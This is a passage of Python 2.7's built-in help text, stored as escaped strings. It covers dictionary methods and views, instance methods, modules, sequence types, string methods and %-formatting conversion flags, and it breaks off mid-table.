value)" pairs.\n\n **CPython implementation detail:** Keys and values are listed in\n an arbitrary order which is non-random, varies across Python\n implementations, and depends on the dictionary\'s history of\n insertions and deletions.\n\n If "items()", "keys()", "values()", "iteritems()", "iterkeys()",\n and "itervalues()" are called with no intervening modifications\n to the dictionary, the lists will directly correspond. This\n allows the creation of "(value, key)" pairs using "zip()":\n "pairs = zip(d.values(), d.keys())". The same relationship\n holds for the "iterkeys()" and "itervalues()" methods: "pairs =\n zip(d.itervalues(), d.iterkeys())" provides the same value for\n "pairs". Another way to create the same list is "pairs = [(v, k)\n for (k, v) in d.iteritems()]".\n\n iteritems()\n\n Return an iterator over the dictionary\'s "(key, value)" pairs.\n See the note for "dict.items()".\n\n Using "iteritems()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n iterkeys()\n\n Return an iterator over the dictionary\'s keys. See the note for\n "dict.items()".\n\n Using "iterkeys()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n itervalues()\n\n Return an iterator over the dictionary\'s values. See the note\n for "dict.items()".\n\n Using "itervalues()" while adding or deleting entries in the\n dictionary may raise a "RuntimeError" or fail to iterate over\n all entries.\n\n New in version 2.2.\n\n keys()\n\n Return a copy of the dictionary\'s list of keys. See the note\n for "dict.items()".\n\n pop(key[, default])\n\n If *key* is in the dictionary, remove it and return its value,\n else return *default*. If *default* is not given and *key* is\n not in the dictionary, a "KeyError" is raised.\n\n New in version 2.3.\n\n popitem()\n\n Remove and return an arbitrary "(key, value)" pair from the\n dictionary.\n\n "popitem()" is useful to destructively iterate over a\n dictionary, as often used in set algorithms. If the dictionary\n is empty, calling "popitem()" raises a "KeyError".\n\n setdefault(key[, default])\n\n If *key* is in the dictionary, return its value. If not, insert\n *key* with a value of *default* and return *default*. *default*\n defaults to "None".\n\n update([other])\n\n Update the dictionary with the key/value pairs from *other*,\n overwriting existing keys. Return "None".\n\n "update()" accepts either another dictionary object or an\n iterable of key/value pairs (as tuples or other iterables of\n length two). If keyword arguments are specified, the dictionary\n is then updated with those key/value pairs: "d.update(red=1,\n blue=2)".\n\n Changed in version 2.4: Allowed the argument to be an iterable\n of key/value pairs and allowed keyword arguments.\n\n values()\n\n Return a copy of the dictionary\'s list of values. See the note\n for "dict.items()".\n\n viewitems()\n\n Return a new view of the dictionary\'s items ("(key, value)"\n pairs). See below for documentation of view objects.\n\n New in version 2.7.\n\n viewkeys()\n\n Return a new view of the dictionary\'s keys. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n viewvalues()\n\n Return a new view of the dictionary\'s values. See below for\n documentation of view objects.\n\n New in version 2.7.\n\n Dictionaries compare equal if and only if they have the same "(key,\n value)" pairs.\n\n\nDictionary view objects\n=======================\n\nThe objects returned by "dict.viewkeys()", "dict.viewvalues()" and\n"dict.viewitems()" are *view objects*. They provide a dynamic view on\nthe dictionary\'s entries, which means that when the dictionary\nchanges, the view reflects these changes.\n\nDictionary views can be iterated over to yield their respective data,\nand support membership tests:\n\nlen(dictview)\n\n Return the number of entries in the dictionary.\n\niter(dictview)\n\n Return an iterator over the keys, values or items (represented as\n tuples of "(key, value)") in the dictionary.\n\n Keys and values are iterated over in an arbitrary order which is\n non-random, varies across Python implementations, and depends on\n the dictionary\'s history of insertions and deletions. If keys,\n values and items views are iterated over with no intervening\n modifications to the dictionary, the order of items will directly\n correspond. This allows the creation of "(value, key)" pairs using\n "zip()": "pairs = zip(d.values(), d.keys())". Another way to\n create the same list is "pairs = [(v, k) for (k, v) in d.items()]".\n\n Iterating views while adding or deleting entries in the dictionary\n may raise a "RuntimeError" or fail to iterate over all entries.\n\nx in dictview\n\n Return "True" if *x* is in the underlying dictionary\'s keys, values\n or items (in the latter case, *x* should be a "(key, value)"\n tuple).\n\nKeys views are set-like since their entries are unique and hashable.\nIf all values are hashable, so that (key, value) pairs are unique and\nhashable, then the items view is also set-like. (Values views are not\ntreated as set-like since the entries are generally not unique.) Then\nthese set operations are available ("other" refers either to another\nview or a set):\n\ndictview & other\n\n Return the intersection of the dictview and the other object as a\n new set.\n\ndictview | other\n\n Return the union of the dictview and the other object as a new set.\n\ndictview - other\n\n Return the difference between the dictview and the other object\n (all elements in *dictview* that aren\'t in *other*) as a new set.\n\ndictview ^ other\n\n Return the symmetric difference (all elements either in *dictview*\n or *other*, but not in both) of the dictview and the other object\n as a new set.\n\nAn example of dictionary view usage:\n\n >>> dishes = {\'eggs\': 2, \'sausage\': 1, \'bacon\': 1, \'spam\': 500}\n >>> keys = dishes.viewkeys()\n >>> values = dishes.viewvalues()\n\n >>> # iteration\n >>> n = 0\n >>> for val in values:\n ... n += val\n >>> print(n)\n 504\n\n >>> # keys and values are iterated over in the same order\n >>> list(keys)\n [\'eggs\', \'bacon\', \'sausage\', \'spam\']\n >>> list(values)\n [2, 1, 1, 500]\n\n >>> # view objects are dynamic and reflect dict changes\n >>> del dishes[\'eggs\']\n >>> del dishes[\'sausage\']\n >>> list(keys)\n [\'spam\', \'bacon\']\n\n >>> # set operations\n >>> keys & {\'eggs\', \'bacon\', \'salad\'}\n {\'bacon\'}\n', 'typesmethods': u'\nMethods\n*******\n\nMethods are functions that are called using the attribute notation.\nThere are two flavors: built-in methods (such as "append()" on lists)\nand class instance methods. Built-in methods are described with the\ntypes that support them.\n\nThe implementation adds two special read-only attributes to class\ninstance methods: "m.im_self" is the object on which the method\noperates, and "m.im_func" is the function implementing the method.\nCalling "m(arg-1, arg-2, ..., arg-n)" is completely equivalent to\ncalling "m.im_func(m.im_self, arg-1, arg-2, ..., arg-n)".\n\nClass instance methods are either *bound* or *unbound*, referring to\nwhether the method was accessed through an instance or a class,\nrespectively. When a method is unbound, its "im_self" attribute will\nbe "None" and if called, an explicit "self" object must be passed as\nthe first argument. In this case, "self" must be an instance of the\nunbound method\'s class (or a subclass of that class), otherwise a\n"TypeError" is raised.\n\nLike function objects, methods objects support getting arbitrary\nattributes. However, since method attributes are actually stored on\nthe underlying function object ("meth.im_func"), setting method\nattributes on either bound or unbound methods is disallowed.\nAttempting to set an attribute on a method results in an\n"AttributeError" being raised. In order to set a method attribute,\nyou need to explicitly set it on the underlying function object:\n\n >>> class C:\n ... def method(self):\n ... pass\n ...\n >>> c = C()\n >>> c.method.whoami = \'my name is method\' # can\'t set on the method\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n AttributeError: \'instancemethod\' object has no attribute \'whoami\'\n >>> c.method.im_func.whoami = \'my name is method\'\n >>> c.method.whoami\n \'my name is method\'\n\nSee The standard type hierarchy for more information.\n', 'typesmodules': u'\nModules\n*******\n\nThe only special operation on a module is attribute access: "m.name",\nwhere *m* is a module and *name* accesses a name defined in *m*\'s\nsymbol table. Module attributes can be assigned to. (Note that the\n"import" statement is not, strictly speaking, an operation on a module\nobject; "import foo" does not require a module object named *foo* to\nexist, rather it requires an (external) *definition* for a module\nnamed *foo* somewhere.)\n\nA special attribute of every module is "__dict__". This is the\ndictionary containing the module\'s symbol table. Modifying this\ndictionary will actually change the module\'s symbol table, but direct\nassignment to the "__dict__" attribute is not possible (you can write\n"m.__dict__[\'a\'] = 1", which defines "m.a" to be "1", but you can\'t\nwrite "m.__dict__ = {}"). Modifying "__dict__" directly is not\nrecommended.\n\nModules built into the interpreter are written like this: "<module\n\'sys\' (built-in)>". If loaded from a file, they are written as\n"<module \'os\' from \'/usr/local/lib/pythonX.Y/os.pyc\'>".\n', 'typesseq': u'\nSequence Types --- "str", "unicode", "list", "tuple", "bytearray", "buffer", "xrange"\n*************************************************************************************\n\nThere are seven sequence types: strings, Unicode strings, lists,\ntuples, bytearrays, buffers, and xrange objects.\n\nFor other containers see the built in "dict" and "set" classes, and\nthe "collections" module.\n\nString literals are written in single or double quotes: "\'xyzzy\'",\n""frobozz"". See String literals for more about string literals.\nUnicode strings are much like strings, but are specified in the syntax\nusing a preceding "\'u\'" character: "u\'abc\'", "u"def"". In addition to\nthe functionality described here, there are also string-specific\nmethods described in the String Methods section. Lists are constructed\nwith square brackets, separating items with commas: "[a, b, c]".\nTuples are constructed by the comma operator (not within square\nbrackets), with or without enclosing parentheses, but an empty tuple\nmust have the enclosing parentheses, such as "a, b, c" or "()". A\nsingle item tuple must have a trailing comma, such as "(d,)".\n\nBytearray objects are created with the built-in function\n"bytearray()".\n\nBuffer objects are not directly supported by Python syntax, but can be\ncreated by calling the built-in function "buffer()". They don\'t\nsupport concatenation or repetition.\n\nObjects of type xrange are similar to buffers in that there is no\nspecific syntax to create them, but they are created using the\n"xrange()" function. They don\'t support slicing, concatenation or\nrepetition, and using "in", "not in", "min()" or "max()" on them is\ninefficient.\n\nMost sequence types support the following operations. The "in" and\n"not in" operations have the same priorities as the comparison\noperations. The "+" and "*" operations have the same priority as the\ncorresponding numeric operations. [3] Additional methods are provided\nfor Mutable Sequence Types.\n\nThis table lists the sequence operations sorted in ascending priority.\nIn the table, *s* and *t* are sequences of the same type; *n*, *i* and\n*j* are integers:\n\n+--------------------+----------------------------------+------------+\n| Operation | Result | Notes |\n+====================+==================================+============+\n| "x in s" | "True" if an item of *s* is | (1) |\n| | equal to *x*, else "False" | |\n+--------------------+----------------------------------+------------+\n| "x not in s" | "False" if an item of *s* is | (1) |\n| | equal to *x*, else "True" | |\n+--------------------+----------------------------------+------------+\n| "s + t" | the concatenation of *s* and *t* | (6) |\n+--------------------+----------------------------------+------------+\n| "s * n, n * s" | equivalent to adding *s* to | (2) |\n| | itself *n* times | |\n+--------------------+----------------------------------+------------+\n| "s[i]" | *i*th item of *s*, origin 0 | (3) |\n+--------------------+----------------------------------+------------+\n| "s[i:j]" | slice of *s* from *i* to *j* | (3)(4) |\n+--------------------+----------------------------------+------------+\n| "s[i:j:k]" | slice of *s* from *i* to *j* | (3)(5) |\n| | with step *k* | |\n+--------------------+----------------------------------+------------+\n| "len(s)" | length of *s* | |\n+--------------------+----------------------------------+------------+\n| "min(s)" | smallest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "max(s)" | largest item of *s* | |\n+--------------------+----------------------------------+------------+\n| "s.index(x)" | index of the first occurrence of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n| "s.count(x)" | total number of occurrences of | |\n| | *x* in *s* | |\n+--------------------+----------------------------------+------------+\n\nSequence types also support comparisons. In particular, tuples and\nlists are compared lexicographically by comparing corresponding\nelements. This means that to compare equal, every element must compare\nequal and the two sequences must be of the same type and have the same\nlength. (For full details see Comparisons in the language reference.)\n\nNotes:\n\n1. When *s* is a string or Unicode string object the "in" and "not\n in" operations act like a substring test. In Python versions\n before 2.3, *x* had to be a string of length 1. In Python 2.3 and\n beyond, *x* may be a string of any length.\n\n2. Values of *n* less than "0" are treated as "0" (which yields an\n empty sequence of the same type as *s*). Note that items in the\n sequence *s* are not copied; they are referenced multiple times.\n This often haunts new Python programmers; consider:\n\n >>> lists = [[]] * 3\n >>> lists\n [[], [], []]\n >>> lists[0].append(3)\n >>> lists\n [[3], [3], [3]]\n\n What has happened is that "[[]]" is a one-element list containing\n an empty list, so all three elements of "[[]] * 3" are references\n to this single empty list. Modifying any of the elements of\n "lists" modifies this single list. You can create a list of\n different lists this way:\n\n >>> lists = [[] for i in range(3)]\n >>> lists[0].append(3)\n >>> lists[1].append(5)\n >>> lists[2].append(7)\n >>> lists\n [[3], [5], [7]]\n\n Further explanation is available in the FAQ entry How do I create a\n multidimensional list?.\n\n3. If *i* or *j* is negative, the index is relative to the end of\n the string: "len(s) + i" or "len(s) + j" is substituted. But note\n that "-0" is still "0".\n\n4. The slice of *s* from *i* to *j* is defined as the sequence of\n items with index *k* such that "i <= k < j". If *i* or *j* is\n greater than "len(s)", use "len(s)". If *i* is omitted or "None",\n use "0". If *j* is omitted or "None", use "len(s)". If *i* is\n greater than or equal to *j*, the slice is empty.\n\n5. The slice of *s* from *i* to *j* with step *k* is defined as the\n sequence of items with index "x = i + n*k" such that "0 <= n <\n (j-i)/k". In other words, the indices are "i", "i+k", "i+2*k",\n "i+3*k" and so on, stopping when *j* is reached (but never\n including *j*). If *i* or *j* is greater than "len(s)", use\n "len(s)". If *i* or *j* are omitted or "None", they become "end"\n values (which end depends on the sign of *k*). Note, *k* cannot be\n zero. If *k* is "None", it is treated like "1".\n\n6. **CPython implementation detail:** If *s* and *t* are both\n strings, some Python implementations such as CPython can usually\n perform an in-place optimization for assignments of the form "s = s\n + t" or "s += t". When applicable, this optimization makes\n quadratic run-time much less likely. This optimization is both\n version and implementation dependent. For performance sensitive\n code, it is preferable to use the "str.join()" method which assures\n consistent linear concatenation performance across versions and\n implementations.\n\n Changed in version 2.4: Formerly, string concatenation never\n occurred in-place.\n\n\nString Methods\n==============\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return centered in a string of length *width*. Padding is done\n using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01 012 0123 01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01 012 0123 01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \"The sum of 1 + 2 is 3\"\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n *iterable* *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \" spacious \".lstrip()\n \"spacious \"\n >>> \"www.example.com\".lstrip(\"cmowz.\")\n \"example.com\"\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \" spacious \".rstrip()\n \" spacious\"\n >>> \"mississippi\".rstrip(\"ipz\")\n \"mississ\"\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\"1,,2\".split(\",\")" returns "[\"1\", \"\", \"2\"]"). The *sep* argument\n may consist of multiple characters (for example,\n "\"1<>2<>3\".split(\"<>\")" returns "[\"1\", \"2\", \"3\"]"). Splitting an\n empty string with a specified separator returns "[\"\"]".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\" 1 2 3 \".split()" returns "[\"1\", \"2\", \"3\"]", and\n "\" 1 2 3 \".split(None, 1)" returns "[\"1\", \"2 3 \"]".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\"ab c\\n\\nde fg\\rkl\\r\\n\".splitlines()" returns "[\"ab\n c\", \"\", \"de fg\", \"kl\"]", while the same call with\n "splitlines(True)" returns "[\"ab c\\n\", \"\\n\", \"de fg\\r\", \"kl\\r\\n\"]".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \" spacious \".strip()\n \"spacious\"\n >>> \"www.example.com\".strip(\"cmowz.\")\n \"example\"\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\"re bill\"s friends from the UK".title()\n "They\"Re Bill\"S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\"[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\"re bill\"s friends.")\n "They\"re Bill\"s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \"read this short text\".translate(None, \"aeiou\")\n \"rd ths shrt txt\"\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of the\n *s* where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module (see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n\n\nString Formatting Operations\n============================\n\nString and Unicode objects have one unique built-in operation: the "%"\noperator (modulo). This is also known as the string *formatting* or\n*interpolation* operator. Given "format % values" (where *format* is\na string or Unicode object), "%" conversion specifications in *format*\nare replaced with zero or more elements of *values*. The effect is\nsimilar to the using "sprintf()" in the C language. If *format* is a\nUnicode object, or if any of the objects being converted using the\n"%s" conversion are Unicode objects, the result will also be a Unicode\nobject.\n\nIf *format* requires a single argument, *values* may be a single non-\ntuple object. [5] Otherwise, *values* must be a tuple with exactly\nthe number of items specified by the format string, or a single\nmapping object (for example, a dictionary).\n\nA conversion specifier contains two or more characters and has the\nfollowing components, which must occur in this order:\n\n1. The "\"%\"" character, which marks the start of the specifier.\n\n2. Mapping key (optional), consisting of a parenthesised sequence\n of characters (for example, "(somename)").\n\n3. Conversion flags (optional), which affect the result of some\n conversion types.\n\n4. Minimum field width (optional). If specified as an "\"*\""\n (asterisk), the actual width is read from the next element of the\n tuple in *values*, and the object to convert comes after the\n minimum field width and optional precision.\n\n5. Precision (optional), given as a "\".\"" (dot) followed by the\n precision. If specified as "\"*\"" (an asterisk), the actual width\n is read from the next element of the tuple in *values*, and the\n value to convert comes after the precision.\n\n6. Length modifier (optional).\n\n7. Conversion type.\n\nWhen the right argument is a dictionary (or other mapping type), then\nthe formats in the string *must* include a parenthesised mapping key\ninto that dictionary inserted immediately after the "\"%\"" character.\nThe mapping key selects the value to be formatted from the mapping.\nFor example:\n\n>>> print \"%(language)s has %(number)03d quote types.\" % \\\n... {"language": "Python", "number": 2}\nPython has 002 quote types.\n\nIn this case no "*" specifiers may occur in a format (since they\nrequire a sequential parameter list).\n\nThe conversion flag characters are:\n\n+-----------+-----------------------------------------------------------------------+\n| Flag | Meaning |\n+===========+=======================================================================+\n| "\'#\'" | The value conversion will use the "alternate form" (where defined |\n| | below). |\n+-----------+-----------------------------------------------------------------------+\n| "\'0\'" | The conversion will be zero padded for numeric values. |\n+-----------+-----------------------------------------------------------------------+\n| "\'-\'" | The converted value is left adjusted (overrides the "\'0\'" conversion |\n| | if both are given). |\n+-----------+-----------------------------------------------------------------------+\n| "\' \'" | (a space) A blank should be left before a positive number (or empty |\n| | string) produced by a signed conversion. |\n+-----------+-----------------------------------------------------------------------+\n| "\'+\'" | A sign character ("\'+\'" or "\'-\'") will precede the conversion |\n| | (overrides a "space" flag). |\n+-----------+-----------------------------------------------------------------------+\n\nA length modifier ("h", "l", or "L") may be present, but is ignored as\nit is not necessary for Python -- so e.g. "%ld" is identical to "%d".\n\nThe conversion types are:\n\n+--------------+-------------------------------------------------------+---------+\n| Conversion | Meaning | Notes |\n+==============+=======================================================+=========+\n| "\'d\'" | Signed integer decimal. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'i\'" | Signed integer decimal. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'o\'" | Signed octal value. | (1) |\n+--------------+-------------------------------------------------------+---------+\n| "\'u\'" | Obsolete type -- it is identical to "\'d\'". | (7) |\n+--------------+-------------------------------------------------------+---------+\n| "\'x\'" | Signed hexadecimal (lowercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'X\'" | Signed hexadecimal (uppercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'e\'" | Floating point exponential format (lowercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'E\'" | Floating point exponential format (uppercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'f\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'F\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'g\'" | Floating point format. Uses lowercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'G\'" | Floating point format. Uses uppercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'c\'" | Single character (accepts integer or single character | |\n| | string). | |\n+--------------+-------------------------------------------------------+---------+\n| "\'r\'" | String (converts any 